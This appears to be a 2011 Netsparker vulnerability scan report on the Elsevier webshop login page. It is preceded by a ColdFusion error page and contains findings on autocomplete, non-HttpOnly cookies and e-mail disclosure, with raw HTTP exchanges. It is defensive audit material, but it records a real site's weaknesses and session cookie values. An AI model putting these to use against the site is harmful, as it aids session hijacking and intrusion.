Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The request has exceeded the allowable time limit Tag: cfoutput
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">

</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr>
<td width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">

The error occurred in <b>D:\wwwroot\elsevier_Estreet\onError.cfm: line 59</b><br>


</td>
</tr>

<tr>
<td colspan="2">


<pre>57 : &lt;p&gt;Please provide the following information to technical support:&lt;/p&gt;
58 :
<b>59 : &lt;cfoutput&gt;</b>
60 :
61 : &lt;p&gt;
</pre>


</td>
</tr>
<tr>
<td colspan="2">
<hr color="#C0C0C0" noshade>
</td>
</tr>

<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Check the <a href='http://www.adobe.com/go/prod_doc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.adobe.com/go/prod_support/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana"></td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">03-May-11 12:45 AM</td>
</tr>
</table>
</td>
</tr>
</table>


<table width="500" cellpadding="0" cellspacing="0">
<tr>
<td valign="top">
<font style="FONT: 8pt/11pt verdana;">

<a href="javascript:;" onMouseOver="window.status='Click to expand stack trace';return true;" onMouseOut="window.status='';return true;" onClick="showHide('cf_stacktrace');return true;">Stack Trace (click to expand)</a>

</td>
</tr>
<tr>
<td id="cf_stacktrace" style="display:none">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
at cfonError2ecfm215532197$funcONERROR.runFunction(D:\wwwroot\elsevier_Estreet\onError.cfm:59)
<br />
<br />
<pre>coldfusion.runtime.RequestTimedOutException: The request has exceeded the allowable time limit Tag: cfoutput at coldfusion.tagext.io.OutputTag.doStartTag(OutputTag.java:149) at cfonError2ecfm215532197$funcONERROR.runFunction(D:\wwwroot\elsevier_Estreet\onError.cfm:59) at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:472) at coldfusion.runtime.UDFMethod$ArgumentCollectionFilter.invoke(UDFMethod.java:368) at coldfusion.filter.FunctionAccessFilter.invoke(FunctionAccessFilter.java:55) at coldfusion.runtime.UDFMethod.runFilterChain(UDFMethod.java:321) at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:220) at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:490) at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:336) at coldfusion.runtime.AppEventInvoker.invoke(AppEventInvoker.java:88) at coldfusion.runtime.AppEventInvoker.onError(AppEventInvoker.java:427) at coldfusion.filter.ApplicationFilter.invoke(ApplicationFilter.java:408) at coldfusion.filter.RequestMonitorFilter.invoke(RequestMonitorFilter.java:48) at coldfusion.filter.MonitoringFilter.invoke(MonitoringFilter.java:40) at coldfusion.filter.PathFilter.invoke(PathFilter.java:87) at coldfusion.filter.ExceptionFilter.invoke(ExceptionFilter.java:70) at coldfusion.filter.ClientScopePersistenceFilter.invoke(ClientScopePersistenceFilter.java:28) at coldfusion.filter.BrowserFilter.invoke(BrowserFilter.java:38) at coldfusion.filter.NoCacheFilter.invoke(NoCacheFilter.java:46) at coldfusion.filter.GlobalsFilter.invoke(GlobalsFilter.java:38) at coldfusion.filter.DatasourceFilter.invoke(DatasourceFilter.java:22) at coldfusion.filter.CachingFilter.invoke(CachingFilter.java:53) at coldfusion.CfmServlet.service(CfmServlet.java:200) at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:89) at jrun.servlet.FilterChain.doFilter(FilterChain.java:86) at coldfusion.monitor.event.MonitoringServletFilter.doFilter(MonitoringServletFilter.java:42) at coldfusion.bootstrap.BootstrapFilter.doFilter(BootstrapFilter.java:46) at jrun.servlet.FilterChain.doFilter(FilterChain.java:94) at jrun.servlet.FilterChain.service(FilterChain.java:101) at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106) at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42) at jrun.servlet.JRunRequestDispatcher.invoke(JRunRequestDispatcher.java:286) at jrun.servlet.ServletEngineService.dispatch(ServletEngineService.java:543) at jrun.servlet.jrpp.JRunProxyService.invokeRunnable(JRunProxyService.java:203) at jrunx.scheduler.ThreadPool$DownstreamMetrics.invokeRunnable(ThreadPool.java:320) at jrunx.scheduler.ThreadPool$ThreadThrottle.invokeRunnable(ThreadPool.java:428) at jrunx.scheduler.ThreadPool$UpstreamMetrics.invokeRunnable(ThreadPool.java:266) at jrunx.scheduler.WorkerThread.run(WorkerThread.java:66)</pre></td>
</tr>
</table>

</font>
</td>
</tr>
</table>
</body></html>


Auto Complete Enabled

Auto Complete Enabled
1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /login.cfm

/login.cfm CONFIRMED

https://webshop.elsevier.com/login.cfm?d46

Identified Field Name

login_mailto

Request

GET /login.cfm?d46 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: webshop.elsevier.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=1230996;path=/,CFTOKEN=33337590;path=/,ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D;expires=Wed, 24-Apr-2041 22:41:17 GMT;path=/
Date: Mon, 02 May 2011 22:41:17 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com -->
<!-- All rights reserved -->

<html>

<head><script type="text/javascript" src="/cfformscripts/cfform.js"></script><script type="text/javascript" src="/cfformscripts/masks.js"></script>
<link media="all" rel="stylesheet" type="text/css" href="/framework/css/all.css" />
<link rel="shortcut icon" href="/favicon.ico">
<!--[if lt IE 8]><link rel="stylesheet" type="text/css" href="/framework/css/ie.css" media="all" /><![endif]-->
<script type="text/javascript" src="/framework/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/framework/js/buttons-pressed.js"></script>
<script type="text/javascript" src="/framework/js/global.js"></script>

<script type="text/javascript" src="/framework/js/WOM.js"></script>
<script type="text/javascript" src="/framework/js/reflection.js"></script>

<!-- google sitemap -->
<meta name="google-site-verification" content="GiltWI_e197oUBamhGI45SQGaWNK4kt_EQ2RbSdQ86w" />



<title>Elsevier Webshop</title>
<meta name="description" content="Elsevier webshop." />
<meta name="keywords" content="Elsevier,webshop" />
<meta name="robots" content="noindex,nofollow" />
<script type="text/javascript"><!-- _CF_checkloginForm = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element login_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['login_mailto'].value, false)) { _CF_onError(_CF_this, "login_mailto", _CF_this['login_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //form element signup_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['signup_mailto'].value, false)) { _CF_onError(_CF_this, "signup_mailto", _CF_this['signup_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script>
<!--[if !(IE 7)]>
<!-- Start Visual Website Optimizer Code -->
<script type='text/javascript'>
var _vis_opt_account_id = 2736;
var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');
document.write('<script src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script>
<script type='text/javascript'> if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<script src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); } </script>
<script type='text/javascript'> if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); } </script>
<!-- End Visual Website Optimizer Code -->
</script>
<![endif]-->

<!-- Start Google Analytics code -->
<script type="text/javascript">
var _gaq=_gaq||[];
_gaq.push(['_setAccount','UA-18653561-1']);
</script>


<script type="text/javascript" src="/framework/cf/ga.cfm?site=webshop"></script>

<script type="text/javascript">
if(typeof(_vis_opt_GA_track) == "function") {
_vis_opt_GA_track();
}

_gaq.push(['_trackPageview', '/login']);

</script>

<script type="text/javascript">
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>

</head>

<body>

<div id="header">
<div class="header-content">
<div class="header-holder">
<h1 class="logo"><a href="/" title="Back to homepage" alt="Back to homepage">Elsevier</a></h1>
<div class="holder-menu">
<ul class="help">
<li><a href="/pages/support.html">Support & contact</a></li>
</ul>
<ul class="user-menu">

<li><a href="/login.cfm" rel="nofollow">Sign up</a></li>
<li><a href="/login.cfm" rel="nofollow">Login</a></li>

</ul>
</div>
</div>
<div class="header-holder">
<div id="webshop-holder-logo"><a href="/" title="Back to homepage" alt="Back to homepage"><img id="webshop-logo" src="/framework/gfx/logo_webshop.png" title="Back to homepage" alt="Back to homepage" border="0" /></a></div>
<div id="cart">

</div>
</div>
<div class="header-holder">
<div id="nav">
<div class="holder">
<div class="frame">
<ul>
<li>

<a class="home" href="/">

<strong>Home</strong>

</a>

</li>
<li>

<a class="" href="/myarticleservices/">

<strong>My Article Services</strong>

</a>

</li>
<li>

<a class="languageediting" href="/languageediting/">

<strong>Language Editing</strong>

</a>

</li>
<li>

<a class="" href="/illustrationservices/">

<strong>Illustration Services</strong>

</a>

</li>
<li>

<a class="subscription" href="/subscriptions/">

<strong>Subscriptions</strong>

</a>

</li>
<li>

<a class="specialcontent" href="/specialcontent/">

<strong>Special Content</strong>

</a>

</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>

<div id="main">

<div class="main-content">



<div id="content">





<ul class="breadcrumbs">

<li><a href="http://webshop.elsevier.com/"> Home </a></li>

<li> Login </li>

</ul>

<form name="loginForm" id="loginForm" action="/login.cfm?d46" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">

<div class="block">
<p>Existing Customer</p>
<div class="row">
<div class="formfieldname">
E-mail
</div>
<div class="formfield">
<input name="login_mailto" id="login_mailto" type="text" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div class="row">
<div class="formfieldname">
Password
</div>
<div class="formfield">
<input name="password" id="password" type="password" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div class="row">
<div class="formfieldname">
&nbsp;
</div>
<div class="formfield">
<a href="http://webshop.elsevier.com/forgotpassword.html?return_url=%2Flogin%2Ecfm%3Fd46">+ Forgot your password?</a>
</div>
</div>
<div class="btn-holder">
<a class="btn1 bw5" href="javascript:onClickButton('returning_customer')"><span class="l"><em>Login</em></span><span class="r"></span></a>
</div>
</div>

<div class="block">
<p>New customer</p>
<div class="row">
<div class="formfieldname">
E-mail
</div>
<div class="formfield">
<input name="signup_mailto" id="signup_mailto" type="text" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div style="clear:both;"></div>
<div class="row">
<input name="login_rua" type="checkbox" value="1" style="float:left;" id="login_rua" onkeyup="onKeyUpInput(this)" />
<div class="rua">

I have read and understand the <a href="http://webshop.elsevier.com/pages/registereduseragreement.html">Registered User Agreement</a>
and agree to be bound by all of its terms.

</div>
</div>
<div class="btn-holder">
<a class="btn1 bw5" href="javascript:onClickButton('new_customer')"><span class="l"><em>Create an account</em></span><span class="r"></span></a>
</div>
</div>

<input name="login_customertype" id="login_customertype" type="hidden" value="returning_customer" /> <input name="target" id="target" type="hidden" value="http://webshop.elsevier.com/customer/mydesk.cfm" /> </form><script type="text/javascript">
function onClickButton(login_customertype) {
var theForm = document.forms['loginForm']
theForm.login_customertype.value = login_customertype
if (login_customertype == 'new_customer') {
theForm.target.value = 'http://webshop.elsevier.com/signup.cfm'
}
if (_CF_checkloginForm(theForm)){
theForm.submit()
}
}
function onKeyUpInput(elInput) {
if (event.keyCode == 13) {
if (elInput.name == 'login_mailto' || elInput.name == 'password') {
onClickButton('returning_customer')
} else if (elInput.name == 'signup_mailto' || elInput.name == 'login_rua') {
onClickButton('new_customer')
}
}
}
// focus on first form field
window.focus()
setTimeout("document.forms['loginForm'].elements['login_mailto'].focus()", 50)
</script>
<iframe name="actionFrame" src="/framework/empty.htm" style="width:100%; height:0px; visibility:hidden"></iframe>


</div>


</div>
</div>
<div id="footer">
<div class="footer-content">
<p>Copyright © 2011 <a href="http://www.elsevier.com">Elsevier B. V.</a> All rights reserved</p>
</div>
<div class="footer-list">
<div class="footer-content">
<strong class="logo-footer"><a href="http://webshop.elsevier.com/">Elsevier</a></strong>
<div class="box-list">
<div class="list">
<h3>Products & Services</h3><a href="http://webshop.elsevier.com/myarticleservices/journalissues/" target="_self">Journal issue</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/journalcoverposter" target="_self">Journal cover poster</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/articleposter" target="_self">Article poster</a><br /><a href="http://webshop.elsevier.com/myarticleservices/offprints/" target="_self">Article offprints</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/certificateofpublication" target="_self">Certificate of publication</a><br /><a href="http://webshop.elsevier.com/myarticleservices/booklets/?product_id=4556" target="_self">Personalized article book</a><br /><a href="http://webshop.elsevier.com/languageediting/" target="_self">Language editing</a><br /><a href="http://webshop.elsevier.com/illustrationservices" target="_self">Illustration services</a><br />
</div>
<div class="list">
<h3>Support</h3><a href="http://webshop.elsevier.com/pages/support.html" target="_self">Customer Service Contact</a><br /><a href="http://webshop.elsevier.com/pages/shippingdelivery.html" target="_self">Shipping Rates & Delivery</a><br /><a href="http://webshop.elsevier.com/pages/faq.html" target="_self">FAQ</a><br /><a href="http://webshop.elsevier.com/pages/termsofservice.html" target="_self">Terms of service</a><br />
</div>
<div class="list">
<h3>About Webshop</h3><a href="http://webshop.elsevier.com/pages/about.html" target="_self">About</a><br /><a href="http://webshop.elsevier.com/pages/productsandservices.html" target="_self">Products & Services</a><br /><a href="http://webshop.elsevier.com/pages/privacypolicy.html" target="_self">Privacy Policy</a><br /><a href="http://webshop.elsevier.com/pages/sitemap.html" target="_self">Sitemap</a><br />
</div>
<div class="list">
<h3>Login</h3><a href="https://webshop.elsevier.com/login.cfm" target="_self">Sign up</a><br /><a href="https://webshop.elsevier.com/login.cfm" target="_self">Sign in </a><br />
</div>
</div>
</div>
</div>
</div>
<div id="tempmsg"></div>



<!-- fire onload events -->
<script type="text/javascript">womOn()</script>
</body>
</html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /login.cfm

/login.cfm CONFIRMED

https://webshop.elsevier.com/login.cfm?d46

Identified Cookie

CFID

Request

GET /login.cfm?d46 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: webshop.elsevier.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=1230996;path=/,CFTOKEN=33337590;path=/,ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D;expires=Wed, 24-Apr-2041 22:41:17 GMT;path=/
Date: Mon, 02 May 2011 22:41:17 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com -->
<!-- All rights reserved -->

<html>

<head><script type="text/javascript" src="/cfformscripts/cfform.js"></script><script type="text/javascript" src="/cfformscripts/masks.js"></script>
<link media="all" rel="stylesheet" type="text/css" href="/framework/css/all.css" />
<link rel="shortcut icon" href="/favicon.ico">
<!--[if lt IE 8]><link rel="stylesheet" type="text/css" href="/framework/css/ie.css" media="all" /><![endif]-->
<script type="text/javascript" src="/framework/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/framework/js/buttons-pressed.js"></script>
<script type="text/javascript" src="/framework/js/global.js"></script>

<script type="text/javascript" src="/framework/js/WOM.js"></script>
<script type="text/javascript" src="/framework/js/reflection.js"></script>

<!-- google sitemap -->
<meta name="google-site-verification" content="GiltWI_e197oUBamhGI45SQGaWNK4kt_EQ2RbSdQ86w" />



<title>Elsevier Webshop</title>
<meta name="description" content="Elsevier webshop." />
<meta name="keywords" content="Elsevier,webshop" />
<meta name="robots" content="noindex,nofollow" />
<script type="text/javascript"><!-- _CF_checkloginForm = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element login_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['login_mailto'].value, false)) { _CF_onError(_CF_this, "login_mailto", _CF_this['login_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //form element signup_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['signup_mailto'].value, false)) { _CF_onError(_CF_this, "signup_mailto", _CF_this['signup_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script>
<!--[if !(IE 7)]>
<!-- Start Visual Website Optimizer Code -->
<script type='text/javascript'>
var _vis_opt_account_id = 2736;
var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');
document.write('<script src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script>
<script type='text/javascript'> if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<script src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); } </script>
<script type='text/javascript'> if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); } </script>
<!-- End Visual Website Optimizer Code -->
</script>
<![endif]-->

<!-- Start Google Analytics code -->
<script type="text/javascript">
var _gaq=_gaq||[];
_gaq.push(['_setAccount','UA-18653561-1']);
</script>


<script type="text/javascript" src="/framework/cf/ga.cfm?site=webshop"></script>

<script type="text/javascript">
if(typeof(_vis_opt_GA_track) == "function") {
_vis_opt_GA_track();
}

_gaq.push(['_trackPageview', '/login']);

</script>

<script type="text/javascript">
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>

</head>

<body>

<div id="header">
<div class="header-content">
<div class="header-holder">
<h1 class="logo"><a href="/" title="Back to homepage" alt="Back to homepage">Elsevier</a></h1>
<div class="holder-menu">
<ul class="help">
<li><a href="/pages/support.html">Support & contact</a></li>
</ul>
<ul class="user-menu">

<li><a href="/login.cfm" rel="nofollow">Sign up</a></li>
<li><a href="/login.cfm" rel="nofollow">Login</a></li>

</ul>
</div>
</div>
<div class="header-holder">
<div id="webshop-holder-logo"><a href="/" title="Back to homepage" alt="Back to homepage"><img id="webshop-logo" src="/framework/gfx/logo_webshop.png" title="Back to homepage" alt="Back to homepage" border="0" /></a></div>
<div id="cart">

</div>
</div>
<div class="header-holder">
<div id="nav">
<div class="holder">
<div class="frame">
<ul>
<li>

<a class="home" href="/">

<strong>Home</strong>

</a>

</li>
<li>

<a class="" href="/myarticleservices/">

<strong>My Article Services</strong>

</a>

</li>
<li>

<a class="languageediting" href="/languageediting/">

<strong>Language Editing</strong>

</a>

</li>
<li>

<a class="" href="/illustrationservices/">

<strong>Illustration Services</strong>

</a>

</li>
<li>

<a class="subscription" href="/subscriptions/">

<strong>Subscriptions</strong>

</a>

</li>
<li>

<a class="specialcontent" href="/specialcontent/">

<strong>Special Content</strong>

</a>

</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>

<div id="main">

<div class="main-content">



<div id="content">





<ul class="breadcrumbs">

<li><a href="http://webshop.elsevier.com/"> Home </a></li>

<li> Login </li>

</ul>

<form name="loginForm" id="loginForm" action="/login.cfm?d46" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">

<div class="block">
<p>Existing Customer</p>
<div class="row">
<div class="formfieldname">
E-mail
</div>
<div class="formfield">
<input name="login_mailto" id="login_mailto" type="text" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div class="row">
<div class="formfieldname">
Password
</div>
<div class="formfield">
<input name="password" id="password" type="password" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div class="row">
<div class="formfieldname">
&nbsp;
</div>
<div class="formfield">
<a href="http://webshop.elsevier.com/forgotpassword.html?return_url=%2Flogin%2Ecfm%3Fd46">+ Forgot your password?</a>
</div>
</div>
<div class="btn-holder">
<a class="btn1 bw5" href="javascript:onClickButton('returning_customer')"><span class="l"><em>Login</em></span><span class="r"></span></a>
</div>
</div>

<div class="block">
<p>New customer</p>
<div class="row">
<div class="formfieldname">
E-mail
</div>
<div class="formfield">
<input name="signup_mailto" id="signup_mailto" type="text" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div style="clear:both;"></div>
<div class="row">
<input name="login_rua" type="checkbox" value="1" style="float:left;" id="login_rua" onkeyup="onKeyUpInput(this)" />
<div class="rua">

I have read and understand the <a href="http://webshop.elsevier.com/pages/registereduseragreement.html">Registered User Agreement</a>
and agree to be bound by all of its terms.

</div>
</div>
<div class="btn-holder">
<a class="btn1 bw5" href="javascript:onClickButton('new_customer')"><span class="l"><em>Create an account</em></span><span class="r"></span></a>
</div>
</div>

<input name="login_customertype" id="login_customertype" type="hidden" value="returning_customer" /> <input name="target" id="target" type="hidden" value="http://webshop.elsevier.com/customer/mydesk.cfm" /> </form><script type="text/javascript">
function onClickButton(login_customertype) {
var theForm = document.forms['loginForm']
theForm.login_customertype.value = login_customertype
if (login_customertype == 'new_customer') {
theForm.target.value = 'http://webshop.elsevier.com/signup.cfm'
}
if (_CF_checkloginForm(theForm)){
theForm.submit()
}
}
function onKeyUpInput(elInput) {
if (event.keyCode == 13) {
if (elInput.name == 'login_mailto' || elInput.name == 'password') {
onClickButton('returning_customer')
} else if (elInput.name == 'signup_mailto' || elInput.name == 'login_rua') {
onClickButton('new_customer')
}
}
}
// focus on first form field
window.focus()
setTimeout("document.forms['loginForm'].elements['login_mailto'].focus()", 50)
</script>
<iframe name="actionFrame" src="/framework/empty.htm" style="width:100%; height:0px; visibility:hidden"></iframe>


</div>


</div>
</div>
<div id="footer">
<div class="footer-content">
<p>Copyright © 2011 <a href="http://www.elsevier.com">Elsevier B. V.</a> All rights reserved</p>
</div>
<div class="footer-list">
<div class="footer-content">
<strong class="logo-footer"><a href="http://webshop.elsevier.com/">Elsevier</a></strong>
<div class="box-list">
<div class="list">
<h3>Products & Services</h3><a href="http://webshop.elsevier.com/myarticleservices/journalissues/" target="_self">Journal issue</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/journalcoverposter" target="_self">Journal cover poster</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/articleposter" target="_self">Article poster</a><br /><a href="http://webshop.elsevier.com/myarticleservices/offprints/" target="_self">Article offprints</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/certificateofpublication" target="_self">Certificate of publication</a><br /><a href="http://webshop.elsevier.com/myarticleservices/booklets/?product_id=4556" target="_self">Personalized article book</a><br /><a href="http://webshop.elsevier.com/languageediting/" target="_self">Language editing</a><br /><a href="http://webshop.elsevier.com/illustrationservices" target="_self">Illustration services</a><br />
</div>
<div class="list">
<h3>Support</h3><a href="http://webshop.elsevier.com/pages/support.html" target="_self">Customer Service Contact</a><br /><a href="http://webshop.elsevier.com/pages/shippingdelivery.html" target="_self">Shipping Rates & Delivery</a><br /><a href="http://webshop.elsevier.com/pages/faq.html" target="_self">FAQ</a><br /><a href="http://webshop.elsevier.com/pages/termsofservice.html" target="_self">Terms of service</a><br />
</div>
<div class="list">
<h3>About Webshop</h3><a href="http://webshop.elsevier.com/pages/about.html" target="_self">About</a><br /><a href="http://webshop.elsevier.com/pages/productsandservices.html" target="_self">Products & Services</a><br /><a href="http://webshop.elsevier.com/pages/privacypolicy.html" target="_self">Privacy Policy</a><br /><a href="http://webshop.elsevier.com/pages/sitemap.html" target="_self">Sitemap</a><br />
</div>
<div class="list">
<h3>Login</h3><a href="https://webshop.elsevier.com/login.cfm" target="_self">Sign up</a><br /><a href="https://webshop.elsevier.com/login.cfm" target="_self">Sign in </a><br />
</div>
</div>
</div>
</div>
</div>
<div id="tempmsg"></div>



<!-- fire onload events -->
<script type="text/javascript">womOn()</script>
</body>
</html>
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /login.cfm

/login.cfm

